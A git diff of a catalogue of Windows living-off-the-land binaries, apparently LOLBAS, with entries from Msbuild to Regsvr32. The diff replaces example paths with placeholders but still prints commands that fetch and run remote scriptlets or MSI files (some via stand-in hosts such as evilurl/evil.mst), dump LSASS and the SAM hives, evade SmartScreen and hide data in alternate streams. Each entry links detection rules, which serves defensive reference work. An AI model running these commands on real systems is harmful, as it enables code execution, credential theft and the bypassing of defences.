- Elastic: https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml
@ -53,6 +51,5 @@ Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
- Person: RichRumble
Handle: ''
- Person: Cedric
Handle: '@th3c3dr1c'

18
yml/OSBinaries/Msbuild.yml
View File

@ -1,10 +1,10 @@
---
Name: Msbuild.exe
Description: Used to compile and execute code
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msbuild.exe pshell.xml
- Command: msbuild.exe {PATH:.xml}
Description: Build and execute a C# project stored in the target XML file.
Usecase: Compile and run code
Category: AWL Bypass
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe project.csproj
- Command: msbuild.exe {PATH:.csproj}
Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code
Category: Execute
@ -22,8 +22,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export
- Command: msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export.
Usecase: Execute DLL
Category: Execute
Privileges: User
@ -31,8 +31,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
- Command: msbuild.exe {PATH:.proj}
Description: Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters
Category: Execute
Privileges: User
@ -40,7 +40,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: XSL
- Command: msbuild.exe @sample.rsp
- Command: msbuild.exe @{PATH:.rsp}
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections
Category: Execute
@ -57,8 +57,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml

2
yml/OSBinaries/Msconfig.yml
View File

@ -1,7 +1,7 @@
---
Name: Msconfig.exe
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Msconfig.exe -5

10
yml/OSBinaries/Msdt.yml
View File

@ -1,11 +1,11 @@
---
Name: Msdt.exe
Description: Microsoft diagnostics tool
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.
Usecase: Execute code
Category: Execute
Privileges: User
@ -14,8 +14,8 @@ Commands:
Tags:
- Application: GUI
- Execute: MSI
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.
Usecase: Execute code bypass Application whitelisting
Category: AWL Bypass
Privileges: User

10
yml/OSBinaries/Msedge.yml
View File

@ -4,22 +4,22 @@ Description: Microsoft Edge browser
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: msedge.exe https://example.com/file.exe.txt
Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
- Command: msedge.exe {REMOTEURL:.exe.txt}
Description: Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64
- Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "{REMOTEURL:.base64.html}" > {PATH:.b64}
Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the ping command
- Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"
Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User

10
yml/OSBinaries/Mshta.yml
View File

@ -4,7 +4,7 @@ Description: Used by Windows to execute html applications. (.hta)
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: mshta.exe evilfile.hta
- Command: mshta.exe {PATH:.hta}
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code
Category: Execute
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: HTA
- Execute: Remote
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")"))
Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code
Category: Execute
@ -23,7 +23,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: VBScript
- Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
- Command: mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close();
Description: Executes JavaScript supplied as a command line argument.
Usecase: Execute code
Category: Execute
@ -32,7 +32,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: mshta.exe "C:\ads\file.txt:file.hta"
- Command: mshta.exe "{PATH_ABSOLUTE}:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream
Category: ADS
@ -41,7 +41,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags:
- Execute: HTA
- Command: mshta.exe https://example.com/payload
- Command: mshta.exe {REMOTEURL}
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download

12
yml/OSBinaries/Msiexec.yml
View File

@ -1,10 +1,10 @@
---
Name: Msiexec.exe
Description: Used by Windows to execute msi files
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msiexec /quiet /i cmd.msi
- Command: msiexec /quiet /i {PATH:.msi}
Description: Installs the target .MSI file silently.
Usecase: Execute custom made msi file with attack code
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
- Command: msiexec /q /i {REMOTEURL}
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
Category: Execute
@ -23,7 +23,7 @@ Commands:
Tags:
- Execute: MSI
- Execute: Remote
- Command: msiexec /y "C:\folder\evil.dll"
- Command: msiexec /y {PATH_ABSOLUTE:.dll}
Description: Calls DllRegisterServer to register the target DLL.
Usecase: Execute dll files
Category: Execute
@ -33,7 +33,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /z "C:\folder\evil.dll"
- Command: msiexec /z {PATH_ABSOLUTE:.dll}
Description: Calls DllUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
Category: Execute
@ -43,7 +43,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
- Command: msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
Category: Execute

4
yml/OSBinaries/Netsh.yml
View File

@ -1,10 +1,10 @@
---
Name: Netsh.exe
Description: Netsh is a Windows tool used to manipulate network interface settings.
Author: 'Freddie Barr-Smith'
Author: Freddie Barr-Smith
Created: 2019-12-24
Commands:
- Command: netsh.exe add helper C:\Users\User\file.dll
- Command: netsh.exe add helper {PATH_ABSOLUTE:.dll}
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
Usecase: Proxy execution of .dll
Category: Execute

2
yml/OSBinaries/Ngen.yml
View File

@ -4,7 +4,7 @@ Description: Microsoft Native Image Generator.
Author: Avihay Eldad
Created: 2024-02-19
Commands:
- Command: ngen.exe http://example.com/calc.exe
- Command: ngen.exe {REMOTEURL}
Description: Downloads payload from remote server using the Microsoft Native Image Generator utility.
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

12
yml/OSBinaries/Odbcconf.yml
View File

@ -1,12 +1,12 @@
---
Name: Odbcconf.exe
Description: Used in Windows for managing ODBC connections
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: odbcconf /a {REGSVR c:\test\test.dll}
Description: Execute DllREgisterServer from DLL specified.
Usecase: Execute dll file using technique that can evade defensive counter measures
- Command: odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}
Description: Execute DllRegisterServer from DLL specified.
Usecase: Execute a DLL file using technique that can evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218.008
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: DLL
- Command: |
odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
odbcconf INSTALLDRIVER "lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2"
odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
Description: Install a driver and load the DLL. Requires administrator privileges.
Usecase: Execute dll file using technique that can evade defensive counter measures
@ -24,7 +24,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: odbcconf -f file.rsp
- Command: odbcconf -f {PATH:.rsp}
Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute

8
yml/OSBinaries/Pcalua.yml
View File

@ -1,10 +1,10 @@
---
Name: Pcalua.exe
Description: Program Compatibility Assistant
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: pcalua.exe -a calc.exe
- Command: pcalua.exe -a {PATH:.exe}
Description: Open the target .EXE using the Program Compatibility Assistant.
Usecase: Proxy execution of binary
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: pcalua.exe -a \\server\payload.dll
- Command: pcalua.exe -a {PATH_SMB:.dll}
Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file
Category: Execute
@ -23,7 +23,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
- Command: pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files
Category: Execute

4
yml/OSBinaries/Pcwrun.yml
View File

@ -1,10 +1,10 @@
---
Name: Pcwrun.exe
Description: Program Compatibility Wizard
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Pcwrun.exe c:\temp\beacon.exe
- Command: Pcwrun.exe {PATH_ABSOLUTE:.exe}
Description: Open the target .EXE file with the Program Compatibility Wizard.
Usecase: Proxy execution of binary
Category: Execute

5
yml/OSBinaries/Pktmon.yml
View File

@ -1,7 +1,7 @@
---
Name: Pktmon.exe
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
Author: 'Derek Johnson'
Author: Derek Johnson
Created: 2020-08-12
Commands:
- Command: pktmon.exe start --etw
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\pktmon.exe
- Path: c:\windows\syswow64\pktmon.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml
- IOC: .etl files found on system
@ -30,4 +28,3 @@ Resources:
- Link: https://binar-x79.com/windows-10-secret-sniffer/
Acknowledgement:
- Person: Derek Johnson
Handle: ''

2
yml/OSBinaries/Pnputil.yml
View File

@ -4,7 +4,7 @@ Description: Used for installing drivers
Author: Hai vaknin (lux)
Created: 2020-12-25
Commands:
- Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
- Command: pnputil.exe -i -a {PATH_ABSOLUTE:.inf}
Description: Used for installing drivers
Usecase: Add malicious driver
Category: Execute

6
yml/OSBinaries/Presentationhost.yml
View File

@ -4,16 +4,16 @@ Description: File is used for executing Browser applications
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap
- Command: Presentationhost.exe {PATH_ABSOLUTE:.xbap}
Description: Executes the target XAML Browser Application (XBAP) file
Usecase: Execute code within xbap files
Usecase: Execute code within XBAP files
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: XBAP
- Command: Presentationhost.exe https://example.com/payload
- Command: Presentationhost.exe {REMOTEURL}
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download

12
yml/OSBinaries/Print.yml
View File

@ -1,24 +1,24 @@
---
Name: Print.exe
Description: Used by Windows to send files to the printer
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
- Command: print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
- Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}
Description: Copy file from source to destination
Usecase: Copy files
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
- Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
Usecase: Copy/Download file from remote server
Category: Copy
@ -28,8 +28,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\print.exe
- Path: C:\Windows\SysWOW64\print.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml
- IOC: Print.exe retrieving files from internet

6
yml/OSBinaries/PrintBrm.yml
View File

@ -1,10 +1,10 @@
---
Name: PrintBrm.exe
Description: Printer Migration Command-Line Tool
Author: 'Elliot Killick'
Author: Elliot Killick
Created: 2021-06-21
Commands:
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
- Command: PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}
Description: Create a ZIP file from a folder in a remote drive
Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
Category: Download
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
- Command: PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
Category: ADS

2
yml/OSBinaries/Provlaunch.yml
View File

@ -5,7 +5,7 @@ Author: Grzegorz Tworek
Created: 2023-06-30
Commands:
- Command: provlaunch.exe LOLBin
Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. "reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0" and "reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe". Registry keys are deleted after successful execution.'
Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.'
Usecase: Executes arbitrary command
Category: Execute
Privileges: Administrator

4
yml/OSBinaries/Psr.yml
View File

@ -4,7 +4,7 @@ Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko
Created: 2020-06-27
Commands:
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
- Command: psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
Usecase: Can be used to take screenshots of the user environment
Category: Reconnaissance
@ -14,8 +14,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\psr.exe
- Path: c:\windows\syswow64\psr.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml
- IOC: psr.exe spawned

4
yml/OSBinaries/Rasautou.yml
View File

@ -1,10 +1,10 @@
---
Name: Rasautou.exe
Description: Windows Remote Access Dialer
Author: 'Tony Lambert'
Author: Tony Lambert
Created: 2020-01-10
Commands:
- Command: rasautou -d powershell.dll -p powershell -a a -e e
- Command: rasautou -d {PATH:.dll} -p export_name -a a -e e
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
Usecase: Execute DLL code
Category: Execute

8
yml/OSBinaries/Rdrleakdiag.yml
View File

@ -4,21 +4,21 @@ Description: Microsoft Windows resource leak diagnostic tool
Author: 'John Dwyer'
Created: 2022-05-18
Commands:
- Command: rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1
- Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Description: Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Usecase: Dump process by PID.
Category: Dump
Privileges: User
MitreID: T1003
OperatingSystem: Windows
- Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Usecase: Dump LSASS process.
Category: Dump
Privileges: Administrator
MitreID: T1003.001
OperatingSystem: Windows
- Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Usecase: Dump LSASS process mutliple times.
Category: Dump
@ -28,8 +28,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\rdrleakdiag.exe
- Path: c:\Windows\SysWOW64\rdrleakdiag.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml
- Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html

8
yml/OSBinaries/Reg.yml
View File

@ -1,17 +1,17 @@
---
Name: Reg.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
Usecase: Hide/plant registry information in Alternate data stream for later use
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak
- Command: reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak}
Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material
Usecase: Dump credentials from the Security Account Manager (SAM)
Category: Credentials
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\reg.exe
- Path: C:\Windows\SysWOW64\reg.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml

8
yml/OSBinaries/Regasm.yml
View File

@ -1,11 +1,11 @@
---
Name: Regasm.exe
Description: Part of .NET
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .Net DLL file and executes the RegisterClass function.
- Command: regasm.exe {PATH:.dll}
Description: Loads the target .NET DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: AWL Bypass
Privileges: Local Admin
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL (.NET)
- Command: regasm.exe /U AllTheThingsx64.dll
- Command: regasm.exe /U {PATH:.dll}
Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: Execute

8
yml/OSBinaries/Regedit.yml
View File

@ -1,17 +1,17 @@
---
Name: Regedit.exe
Description: Used by Windows to manipulate registry
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
- Command: regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file.
Usecase: Hide registry data in alternate data stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regedit C:\ads\file.txt:regfile.reg
- Command: regedit {PATH_ABSOLUTE}:regfile.reg
Description: Import the target .REG file into the Registry.
Usecase: Import hidden registry data from alternate data stream
Category: ADS
@ -20,8 +20,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\regedit.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml
- IOC: regedit.exe reading and writing to alternate data stream

6
yml/OSBinaries/Regini.yml
View File

@ -1,10 +1,10 @@
---
Name: Regini.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2020-07-03
Commands:
- Command: regini.exe newfile.txt:hidden.ini
- Command: regini.exe {PATH}:hidden.ini
Description: Write registry keys from data inside the Alternate data stream.
Usecase: Write to registry
Category: ADS
@ -14,8 +14,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\regini.exe
- Path: C:\Windows\SysWOW64\regini.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml

6
yml/OSBinaries/Register-cimprovider.yml
View File

@ -1,10 +1,10 @@
---
Name: Register-cimprovider.exe
Description: Used to register new wmi providers
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Register-cimprovider -path "C:\folder\evil.dll"
- Command: Register-cimprovider -path {PATH_ABSOLUTE:.dll}
Description: Load the target .DLL.
Usecase: Execute code within dll file
Category: Execute
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml
- IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious

10
yml/OSBinaries/Regsvcs.yml
View File

@ -1,11 +1,11 @@
---
Name: Regsvcs.exe
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .Net DLL file and executes the RegisterClass function.
- Command: regsvcs.exe {PATH:.dll}
Description: Loads the target .NET DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: Execute
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL (.NET)
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .Net DLL file and executes the RegisterClass function.
- Command: regsvcs.exe {PATH:.dll}
Description: Loads the target .NET DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL Bypass
Privileges: Local Admin

10
yml/OSBinaries/Regsvr32.yml
View File

@ -1,10 +1,10 @@
---
Name: Regsvr32.exe
Description: Used by Windows to register dlls
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
- Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL Bypass
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: SCT
- Execute: Remote
